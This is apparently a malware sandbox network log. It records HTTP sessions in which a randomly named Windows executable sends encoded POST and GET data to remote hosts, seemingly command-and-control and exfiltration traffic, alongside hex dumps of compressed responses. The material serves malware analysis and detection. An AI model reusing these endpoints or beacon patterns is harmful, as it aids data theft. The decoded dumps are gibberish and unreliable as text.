                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 52 53 55 66 54 51 33 4d 59 4d 49 4e 56 49 6d 47 44 56 69 44 74 2b 41 4d 75 47 64 6d 54 2f 64 77 65 6d 6b 67 48 61 37 54 70 6e 5a 73 64 71 4f 4c 7a 47 45 54 7a 76 59 46 6f 44 6c 43 70 79 38 7a 2f 50 6b 6b 47 71 38 5a 75 38 77 30 46 76 6a 6b 72 46 33 56 6f 36 51 4a 56 74 2f 30 78 69 74 6a 53 4b 7a 6d 73 6b 4e 32 75 34 33 45 68 46 4f 59 79 75 75 6c 5a 7a 56 6d 6f 6e 32 75 49 4f 44 58 47 53 39 64 30 51 6d 71 44 79 6b 62 6a 4e 75 6b 74 66 64 6c 76 79 65 73 49 37 46 44 4f 42 68 57 79 31 73 68 59 74 52 4a 39 31 39 32 57 34 6f 75 4d 35 70 74 4a 59 58 46 54 39 72 50 73 41 3d
                                                            Data Ascii: MHJ0GXi=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvRSUfTQ3MYMINVImGDViDt+AMuGdmT/dwemkgHa7TpnZsdqOLzGETzvYFoDlCpy8z/PkkGq8Zu8w0FvjkrF3Vo6QJVt/0xitjSKzmskN2u43EhFOYyuulZzVmon2uIODXGS9d0QmqDykbjNuktfdlvyesI7FDOBhWy1shYtRJ9192W4ouM5ptJYXFT9rPsA=
                                                            Jan 11, 2025 04:17:30.351012945 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 03:17:29 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                            Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                            Jan 11, 2025 04:17:30.351048946 CET | 1236 | IN | Data Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                            Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                            Jan 11, 2025 04:17:30.351058960 CET | 448 | IN | Data Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                            Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                            Jan 11, 2025 04:17:30.351129055 CET | 1236 | IN | Data Raw: 56 39 ab 65 d6 67 c2 06 7d d7 51 7a 20 85 50 0f 11 82 05 50 24 49 4c 14 42 38 8e 88 a3 50 de 16 a1 f8 8b 04 4b 72 60 b4 1e 5c 94 d5 45 9d 03 a3 6b 75 2e 4c ea a0 ee 81 d1 b1 ba 97 24 b5 b3 a4 f6 85 49 ed 6c 5c fb 92 71 ad 3e 1a c1 de 7d 6b 74 61
                                                            Data Ascii: V9eg}Qz PP$ILB8PKr`\Eku.L$Il\q>}kta\#8xqfCbB Y_HTKDxzB]$y&mRrEzhDf%9+>]]Jz6Rm?$ns.]nG&:;J
                                                            Jan 11, 2025 04:17:30.351145029 CET | 1236 | IN | Data Raw: 24 a4 5c 24 e5 28 21 31 f7 df 8d ad da 8e 97 4f c6 a1 4d e4 4d 0e ce 1b d6 cd a5 7e a0 40 2c 84 f0 42 3e ef 32 73 ad d9 d6 1b de d0 bc f5 66 db 54 a9 07 b1 e4 dd 4e b9 da 6a 2b b6 9b 19 b6 d6 6b eb b4 28 91 11 bb 89 51 ba 51 cd 1c 9b 41 2b 64 0b
                                                            Data Ascii: $\$(!1OMM~@,B>2sfTNj+k(QQA+d"%*p<<{MjL[5+)XTo$[u^TtfIHHBb+.CQ<D@/d6l;YoMeT-by!k=Nw\#}]JB6v})>\us
                                                            Jan 11, 2025 04:17:30.351274967 CET | 1236 | IN | Data Raw: a5 66 8e 39 24 0a 1b 1c 87 50 ee 13 4e 24 06 3a 01 91 66 7a 62 fe 5e 48 f7 b7 92 c4 b1 d1 6f 0c 1a ad 2b d5 7c 50 9e c5 e8 34 da dd 46 f3 81 e1 11 ac 12 e8 72 60 60 17 e0 c0 ee 98 1d 39 49 ac 44 78 64 4b 82 8f 23 41 81 d6 07 06 5c 51 51 ee 43 22
                                                            Data Ascii: f9$PN$:fzb^Ho+|P4Fr``9IDxdK#A\QQC"(=ip9UDB3rpl3qDp;\~yA27;*@C..rvpqd3';wO.81a$\=k$nOQ@lw
                                                            Jan 11, 2025 04:17:30.351288080 CET | 1236 | IN | Data Raw: 5f 24 42 3d 28 16 3d 2a d2 b4 f3 a0 88 ad 83 d1 ee 7d fd 63 63 e7 d8 97 22 e1 ee d1 d2 5c a9 cf 4f 42 9d 95 aa 58 51 e7 78 b6 92 06 67 a9 49 39 5a 2c f3 89 fe 75 49 7c bc 9e aa b0 cd 88 d2 f6 67 6b e5 9e 17 97 a1 83 e6 6a 8c 78 1e 40 8b d7 72 ce
                                                            Data Ascii: _$B=(=*}cc"\OBXQxgI9Z,uI|gkjx@r!rRU#XrSK&Yjt#kH{vEU5zBSi.u]bsfj@1U1W-R]MGzdE`EEJQpV~Y8t*Tgg3
                                                            Jan 11, 2025 04:17:30.351300001 CET | 1236 | IN | Data Raw: 08 92 22 e1 2e 71 2b 7e 5f 52 17 35 0d a2 0d cc a8 cf 91 03 21 22 8d f5 75 37 1c 28 16 0e c5 0c 51 47 f0 b8 c2 4d 31 bd 96 1b 5d 59 84 f4 a3 88 54 9b 35 5c e2 e1 84 95 42 bc 90 44 c8 57 98 72 22 4b b6 ea b3 ab ed 73 e2 a3 15 88 19 7c 73 29 d8 38
                                                            Data Ascii: ".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"4$&fTt`YaNg!ooKcbv$ l<c+^:Vj\)%r5vEUpU8D%6`wn
                                                            Jan 11, 2025 04:17:30.351351023 CET | 1236 | IN | Data Raw: 18 3d dc b9 ca ca 4e 12 2b 11 6e ee bb e1 0f 70 8c 9c 80 32 57 12 5e 71 77 bb bd ca e6 ef 6f d9 d2 58 7d 22 cc 1d b8 11 ec fe 22 7d 93 be 9a 7f 65 a4 6f e6 8f e6 cf e6 4f d2 f3 6c fd 9d ec 3e 45 a3 38 b1 f3 0b d4 de db 95 22 72 c5 94 67 67 bd d9
                                                            Data Ascii: =N+np2W^qwoX}""}eoOl>E8"rgg;k>x?vsF}hx9CkwOrv+g7sTI<_~Jl<NJKA?@[<vBGcWVd5
                                                            Jan 11, 2025 04:17:30.351363897 CET | 1236 | IN | Data Raw: 48 06 27 06 8c 35 2a 74 24 21 1c 09 ce 66 e6 61 c6 cc d8 ca 12 33 06 c6 16 50 5e b2 0f 87 d8 2c 06 a7 5e 02 b9 52 44 ae 98 02 c4 8d e0 d1 11 2c a3 30 e5 44 9a 35 50 f5 80 71 c2 0c ea 16 82 6e a3 41 ab d7 1e b5 ed 1a cc 65 57 c0 c5 68 19 5e a8 b9
                                                            Data Ascii: H'5*t$!fa3P^,^RD,0D5PqnAeWh^k5D2Q(~l0$s:!RA?K_Ib%7PJ*8D;H^oWIznW;NN~/;]wxuGw
                                                            Jan 11, 2025 04:17:30.355911016 CET | 1019 | IN | Data Raw: 6a bc 64 a3 b8 75 17 95 d4 c0 a3 af 93 ea 50 6f 13 38 a0 fe 1a 50 bf 4a 5f 82 c8 5f 18 70 f8 4c 00 7f 05 2a ce e7 4f e7 ff be 86 fd ce 9d 3b 63 8b e3 13 d0 44 6e ba 74 d3 5c da 5b 9c 31 e0 a7 82 17 85 c5 ab e6 4e 45 60 e9 51 22 aa f1 16 d6 a6 07
                                                            Data Ascii: jduPo8PJ__pL*O;cDnt\[1NE`Q"GMl=0v4j*+2R+I pf~<4\0,0,XLz"AH"Rc_GKs>?$u,g<r5HcI#DN.q.


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.7 | 49988 | 192.185.147.100 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:32.136231899 CET | 1841 | OUT | POST /yf1h/ HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.hayaniya.org
                                                            Referer: http://www.hayaniya.org/yf1h/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 58 4b 55 63 68 6f 33 4b 35 4d 49 4d 56 49 6d 46 44 56 6e 44 74 2b 64 4d 75 75 5a 6d 54 79 2f 77 63 75 6b 68 6c 53 37 62 38 54 5a 2f 39 71 4f 41 54 47 4a 4e 44 75 46 46 6f 54 70 43 70 43 38 7a 2f 50 6b 6b 48 61 38 64 38 59 77 37 6c 76 67 6e 72 46 37 43 59 36 34 4a 56 45 4b 30 78 6e 59 67 69 71 7a 6d 4d 55 4e 30 39 51 33 62 52 46 41 56 53 75 32 6c 5a 75 4e 6d 6f 4c 36 75 49 53 6c 58 42 65 39 65 42 41 78 36 68 75 68 48 52 64 4b 36 74 47 77 6b 74 79 7a 76 61 72 38 65 4a 35 47 53 77 52 72 76 75 56 76 43 34 49 45 71 46 73 69 32 64 34 39 37 70 31 44 42 43 68 42 63 4b 44 65 4e 49 76 30 56 31 34 6f 64 79 54 63 67 69 6f 78 42 76 77 4a 34 2f 4f 4a 2b 4b 36 42 53 4b 75 75 6a 49 41 74 32 49 69 2f 55 41 6f 51 56 65 59 37 53 78 4a 68 64 38 2f 68 4d 4a 76 77 75 46 4d 7a 7a 51 6b 4e 50 4b 70 64 6d 66 58 6f 69 38 5a 34 70 53 73 50 6b 35 4f 30 44 59 6a 48 70 4e 32 65 6f 51 [TRUNCATED]
                                                            Data Ascii: MHJ0GXi=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvXKUcho3K5MIMVImFDVnDt+dMuuZmTy/wcukhlS7b8TZ/9qOATGJNDuFFoTpCpC8z/PkkHa8d8Yw7lvgnrF7CY64JVEK0xnYgiqzmMUN09Q3bRFAVSu2lZuNmoL6uISlXBe9eBAx6huhHRdK6tGwktyzvar8eJ5GSwRrvuVvC4IEqFsi2d497p1DBChBcKDeNIv0V14odyTcgioxBvwJ4/OJ+K6BSKuujIAt2Ii/UAoQVeY7SxJhd8/hMJvwuFMzzQkNPKpdmfXoi8Z4pSsPk5O0DYjHpN2eoQGsBuE+0lba0HSXIupUouCIbDqqxPMPQVoO27261vvxwGr/9ELU2ztWrf3UvwnT2r8ypnA63vdNd2qzv5izToH14G0imLOrFz9ta1vGvE+vaIRByAqXa2rjaxb12vs1PQD158WNp6QwHF74HTf8p53bl+zmsesthz58LoTHZ+qqQzt8OJfaPUHvLf10DqIXYGmuIsDXEH7yTDB3onUPWI3XzozCkI5tiuu4yynrsSZmhi0onfnEdopUt9a9+5mqRcK9mC7zPkNtuVaQhgkPNMUau/RHw8v/JtxXWPvatXO0RFX5cp4hB6c/gUQkgsJBkGGHhqG5AegFzr2FfmHnlNBWqAC3revUrvRt7nvWo7qHg/gMLNQRRBKmeOEtYtQnaEXqA+Ha13Osg78WCX9T0F3WqSDxtEDkwm/xH5r6sviLriRpkoNKwO80J3VM+vrAtiIP9iJ3IlzE9vl7UyhvOOk5yvCldiXUEPrPsWTN18rHJAZv17A+C0X0Gp0OmT8lhutcHQuaKoeFi2brgqhoWlrU8DZ5VsNQsd0YD1p8/hQjkzW59kN5PLhoyo44CyKFIxpc4Q+J+4hUF44dS1FqnQacX0QpC06TAWg5yzdPf+SXFY7CbTsduHatyqTPvj0T7zR/VfF2dNPyiA5vRKIBXTAZ2fIP1LbmeDmg [TRUNCATED]
                                                            Jan 11, 2025 04:17:32.930345058 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 03:17:32 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                            Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                            Jan 11, 2025 04:17:32.930368900 CET | 1236 | IN | Data Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                            Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                            Jan 11, 2025 04:17:32.930381060 CET | 448 | IN | Data Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                            Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                            Jan 11, 2025 04:17:32.930438042 CET | 1236 | IN | Data Raw: 56 39 ab 65 d6 67 c2 06 7d d7 51 7a 20 85 50 0f 11 82 05 50 24 49 4c 14 42 38 8e 88 a3 50 de 16 a1 f8 8b 04 4b 72 60 b4 1e 5c 94 d5 45 9d 03 a3 6b 75 2e 4c ea a0 ee 81 d1 b1 ba 97 24 b5 b3 a4 f6 85 49 ed 6c 5c fb 92 71 ad 3e 1a c1 de 7d 6b 74 61
                                                            Data Ascii: V9eg}Qz PP$ILB8PKr`\Eku.L$Il\q>}kta\#8xqfCbB Y_HTKDxzB]$y&mRrEzhDf%9+>]]Jz6Rm?$ns.]nG&:;J
                                                            Jan 11, 2025 04:17:32.930450916 CET | 1236 | IN | Data Raw: 24 a4 5c 24 e5 28 21 31 f7 df 8d ad da 8e 97 4f c6 a1 4d e4 4d 0e ce 1b d6 cd a5 7e a0 40 2c 84 f0 42 3e ef 32 73 ad d9 d6 1b de d0 bc f5 66 db 54 a9 07 b1 e4 dd 4e b9 da 6a 2b b6 9b 19 b6 d6 6b eb b4 28 91 11 bb 89 51 ba 51 cd 1c 9b 41 2b 64 0b
                                                            Data Ascii: $\$(!1OMM~@,B>2sfTNj+k(QQA+d"%*p<<{MjL[5+)XTo$[u^TtfIHHBb+.CQ<D@/d6l;YoMeT-by!k=Nw\#}]JB6v})>\us
                                                            Jan 11, 2025 04:17:32.930598974 CET | 1236 | IN | Data Raw: a5 66 8e 39 24 0a 1b 1c 87 50 ee 13 4e 24 06 3a 01 91 66 7a 62 fe 5e 48 f7 b7 92 c4 b1 d1 6f 0c 1a ad 2b d5 7c 50 9e c5 e8 34 da dd 46 f3 81 e1 11 ac 12 e8 72 60 60 17 e0 c0 ee 98 1d 39 49 ac 44 78 64 4b 82 8f 23 41 81 d6 07 06 5c 51 51 ee 43 22
                                                            Data Ascii: f9$PN$:fzb^Ho+|P4Fr``9IDxdK#A\QQC"(=ip9UDB3rpl3qDp;\~yA27;*@C..rvpqd3';wO.81a$\=k$nOQ@lw
                                                            Jan 11, 2025 04:17:32.930649996 CET | 1236 | IN | Data Raw: 5f 24 42 3d 28 16 3d 2a d2 b4 f3 a0 88 ad 83 d1 ee 7d fd 63 63 e7 d8 97 22 e1 ee d1 d2 5c a9 cf 4f 42 9d 95 aa 58 51 e7 78 b6 92 06 67 a9 49 39 5a 2c f3 89 fe 75 49 7c bc 9e aa b0 cd 88 d2 f6 67 6b e5 9e 17 97 a1 83 e6 6a 8c 78 1e 40 8b d7 72 ce
                                                            Data Ascii: _$B=(=*}cc"\OBXQxgI9Z,uI|gkjx@r!rRU#XrSK&Yjt#kH{vEU5zBSi.u]bsfj@1U1W-R]MGzdE`EEJQpV~Y8t*Tgg3
                                                            Jan 11, 2025 04:17:32.930664062 CET | 328 | IN | Data Raw: 08 92 22 e1 2e 71 2b 7e 5f 52 17 35 0d a2 0d cc a8 cf 91 03 21 22 8d f5 75 37 1c 28 16 0e c5 0c 51 47 f0 b8 c2 4d 31 bd 96 1b 5d 59 84 f4 a3 88 54 9b 35 5c e2 e1 84 95 42 bc 90 44 c8 57 98 72 22 4b b6 ea b3 ab ed 73 e2 a3 15 88 19 7c 73 29 d8 38
                                                            Data Ascii: ".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"4$&fTt`YaNg!ooKcbv$ l<c+^:Vj\)%r5vEUpU8D%6`wn
                                                            Jan 11, 2025 04:17:32.930677891 CET | 1236 | IN | Data Raw: 4a 44 9b 59 85 b5 e9 41 5e c7 1b f4 bc aa 64 03 ea ba c0 45 28 6c ca 40 aa 2e 56 18 51 17 60 eb cc c2 53 e4 1f a9 59 44 26 a6 1e 58 84 62 a2 14 e5 3e ec fd f0 de 17 89 50 0f 6c ec 1c fb 52 24 dc 3d 5a 9a 3a 74 a0 7f 72 9c d4 d1 8f 33 7d ad 7a 02
                                                            Data Ascii: JDYA^dE(l@.VQ`SYD&Xb>PlR$=Z:tr3}zQHDv=AI737p ;QJqEZtM"4\)"Q|}n3c-(dW184@obJEex9u(wG_'Y[
                                                            Jan 11, 2025 04:17:32.930705070 CET | 1236 | IN | Data Raw: c2 df b3 db a4 af db b9 82 fe aa a0 17 9a f2 96 40 ed 1a 12 b5 0a fb f9 b7 55 49 6d 6a fb 12 66 00 3f 90 f1 3d 60 7f a5 c9 78 31 7f 32 ff 0a 9e ff 39 7f b6 24 63 6c 25 2c fb e6 f6 15 78 71 92 58 89 70 93 94 0d 7f 80 63 e4 04 94 b9 92 f0 8a bb 3b
                                                            Data Ascii: @UImjf?=`x129$cl%,xqXpc;VzB>u0w!5%tgG>T$w!Jb@^[~u7eYdv)<s-?|)&e~J;$JbVhl=&c"[=`%Tu`/_W
                                                            Jan 11, 2025 04:17:32.935276985 CET | 1236 | IN | Data Raw: b9 e7 bb f9 a3 f4 f5 ad 91 d3 ed 77 af c4 4d 0d ba 4d 49 e8 24 af f4 2f 98 bb a6 24 34 e4 1c 7f fa a7 f4 fb f4 1c 28 79 7e 8b 0c 0c ae c4 40 bb 02 a8 00 a7 19 d0 8a e8 56 24 84 35 27 e8 c7 66 ee 6b 20 0a c8 32 d2 17 e9 5f 41 4f cf e6 8f 8c 1f 9b
                                                            Data Ascii: wMMI$/$4(y~@V$5'fk 2_AOvo0N@Qo6q<f"fM7gs|3<nnRmPJjSj&^ij^-[}$V"h9e$O]}"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.7 | 49989 | 192.185.147.100 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:34.673593044 CET | 552 | OUT | GET /yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:35.270965099 CET | 513 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Sat, 11 Jan 2025 03:17:35 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.7 | 49990 | 13.248.169.48 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:40.320976019 CET | 802 | OUT | POST /rxts/ HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.lovel.shop
                                                            Referer: http://www.lovel.shop/rxts/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 6f 6b 78 4d 6a 65 77 4e 6b 43 64 32 57 65 6b 37 75 32 57 38 62 33 74 59 43 55 36 71 51 51 79 53 52 75 49 69 31 6f 6c 45 4e 55 4e 74 37 38 6b 2f 37 30 67 6c 46 6c 72 54 50 33 31 43 76 4f 35 4a 53 64 4a 78 66 68 6c 6f 4d 75 78 4b 35 6c 4e 73 71 5a 74 61 54 50 72 6a 54 56 2f 75 41 56 67 63 64 75 6f 43 32 54 69 4a 31 78 2f 43 4f 41 65 44 50 50 59 71 64 6d 57 6a 4e 65 4a 75 56 66 79 48 4b 77 78 65 33 50 32 4d 75 31 42 7a 68 73 55 36 2f 51 51 6e 44 70 7a 50 78 31 30 45 39 4c 6f 78 34 48 39 44 4d 61 71 70 30 71 31 70 37 38 33 30 48 48 65 2b 52 4b 70 45 64 33 5a 69 6b 47 68 30 67 52 57 44 62 41 3d 3d
